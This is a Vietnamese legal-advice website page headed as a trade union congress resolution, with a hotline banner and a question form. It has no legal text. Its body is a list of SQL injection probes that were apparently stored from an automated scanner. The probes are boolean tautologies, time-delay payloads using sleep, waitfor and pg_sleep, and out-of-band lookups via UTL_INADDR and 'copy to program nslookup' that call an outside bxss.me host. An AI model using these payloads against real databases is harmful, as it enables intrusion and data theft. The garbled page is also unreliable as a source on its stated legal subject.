Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Nghị quyết của đại hội công đoàn

Cập nhật lần cuối lúc 14:53 ngày 26/07/2013

Nguồn: vinalaf.com.vn
1
1
1
1
-1 OR 2+485-485-1=0+0+0+1 --
-1 OR 3+485-485-1=0+0+0+1 --
1'"
\
1
-1 OR 3*2<(0+5+485-485) --
@@bqA2t
JyI=
-1 OR 3*2>(0+5+485-485) --
-1 OR 2+292-292-1=0+0+0+1
-1 OR 3+292-292-1=0+0+0+1
-1 OR 3*2<(0+5+292-292)
-1 OR 3*2>(0+5+292-292)
-1' OR 2+656-656-1=0+0+0+1 --
-1' OR 3+656-656-1=0+0+0+1 --
-1' OR 3*2<(0+5+656-656) --
-1' OR 3*2>(0+5+656-656) --
-1' OR 2+179-179-1=0+0+0+1 or 'LA3gLUfw'='
-1' OR 3+179-179-1=0+0+0+1 or 'LA3gLUfw'='
-1' OR 3*2<(0+5+179-179) or 'LA3gLUfw'='
-1' OR 3*2>(0+5+179-179) or 'LA3gLUfw'='
-1" OR 2+145-145-1=0+0+0+1 --
-1" OR 3+145-145-1=0+0+0+1 --
-1" OR 3*2<(0+5+145-145) --
-1" OR 3*2>(0+5+145-145) --
if(now()=sysdate(),sleep(7.5),0)/*'XOR(if(now()=sysdate(),sleep(7.5),0))OR'"XOR(if(now()=sysdate(),sleep(7.5),0))OR"*/
(select(0)from(select(sleep(11.25)))v)/*'+(select(0)from(select(sleep(11.25)))v)+'"+(select(0)from(select(sleep(11.25)))v)+"*/
-1; waitfor delay '0:0:11.25' --
-1); waitfor delay '0:0:11.25' --
-1); waitfor delay '0:0:3.75' --
-1); waitfor delay '0:0:0' --
1 waitfor delay '0:0:7.5' --
5ztsFtxK'; waitfor delay '0:0:11.25' --
-1;select pg_sleep(11.25); --
-1);select pg_sleep(3.75); --
-1));select pg_sleep(3.75); --
Jkks9Cch';select pg_sleep(3.75); --
3brM6dAS');select pg_sleep(7.5); --
YV6oY6D7'));select pg_sleep(7.5); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5828.34060.d5b0c.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5829.34060.d5b0c.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5830.34060.d5b0c.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5832.34060.d5b0c.\1.bxss.me
669'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: